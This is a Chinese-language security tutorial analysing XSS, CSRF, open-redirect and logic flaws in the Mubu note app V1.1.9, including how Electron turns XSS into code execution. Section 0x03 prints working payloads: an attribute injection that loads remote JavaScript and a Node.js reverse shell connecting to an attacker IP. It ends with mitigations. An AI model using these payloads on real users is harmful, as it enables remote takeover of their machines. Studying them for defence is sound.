幕布管理工具V1.1.9漏洞分析与利用教学文档

0x00 前言

幕布是一款多平台同步的头脑管理工具，支持笔记整理、任务管理及思维导图生成。本文基于V1.1.9版本，分析其安全漏洞及利用链，涵盖XSS、CSRF、RCE等漏洞的复现与利用方法。

0x01 背景

• 功能特性：免费版支持多端同步、多种格式导出、脑图演示。
• 技术栈：基于Electron开发，导致XSS可能升级为RCE（远程代码执行）。

0x02 历史漏洞（V1.1.0）

1. CSRF漏洞：
   • 保存文档、创建文件夹等操作未校验Token，可构造恶意页面诱导用户触发。
2. XSS漏洞：
   • 反射型XSS：搜索框未过滤用户输入，直接输出到页面。
   • 存储型XSS：文件夹名、文档名（脑图模式触发）、昵称字段未过滤，可植入恶意脚本。

0x03 当前漏洞（V1.1.9）

1. 残留漏洞：

   • 搜索框XSS：仍可触发弹窗（如<script>alert(1)</script>）。
   • 文件夹名XSS：点击文件夹时触发存储型XSS。
   • 文档ID注入：
     • 请求参数id未过滤，可闭合HTML属性注入事件（如" onmouseover="alert(1)）。
     • 利用链：

       " onmouseover="s=createElement('script');body.appendChild(s);s.src='https://恶意JS链接'"
       

     • 隐蔽性：通过onmouseover事件触发，页面显示正常。

2. RCE升级：

   • Electron漏洞：XSS可调用Node.js的child_process模块执行系统命令。
     • Windows弹计算器：

       require('child_process').exec('calc.exe')
       

     • Mac反弹Shell：

       var net = require("net"), sh = require("child_process").exec("/bin/bash");
       var client = new net.Socket();
       client.connect(端口, "攻击者IP", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);});
       

3. 利用场景：

   • 被动触发：用户保存恶意文档后，客户端查看时触发RCE。
   • 主动攻击：诱导用户登录并访问恶意分享链接，利用XSS创建文档。

0x04 其他漏洞

1. 逻辑缺陷：

   • 手机号绑定绕过：
     • 绑定新手机号无需原手机号验证码，仅需新手机号验证码（可CSRF利用）。
   • 微信解绑绕过：
     • 直接发送解绑请求包（无二次验证），存在CSRF风险。

2. 任意URL跳转：

   • 客户端跳转参数next未校验，可构造恶意链接（如https://mubu.com/client_redirect?next=http://钓鱼网站）。

3. CSRF全局问题：

   • 所有POST操作可转为GET（如修改昵称、创建文档、绑定手机号）。
   • 示例（修改昵称）：

     GET /api/set_nickname?nickname=恶意昵称 HTTP/1.1
     

0x05 防御建议

1. 输入过滤：
   • 对id、文件夹名、搜索框等参数严格过滤HTML特殊字符。
2. CSRF防护：
   • 关键操作添加Token校验，禁用GET请求修改数据。
3. Electron加固：
   • 禁用Node.js集成（nodeIntegration: false）或启用上下文隔离。
4. 逻辑校验：
   • 敏感操作（如解绑、换绑手机号）需二次验证。

附录：漏洞复现步骤

1. XSS验证：
   • 创建文件夹，名称填入``，点击触发。
2. RCE利用：
   • 在文档ID注入恶意脚本，诱导用户客户端打开文档触发计算器。

注：以上漏洞已提交官方修复，严禁用于非法用途。教学仅限安全研究。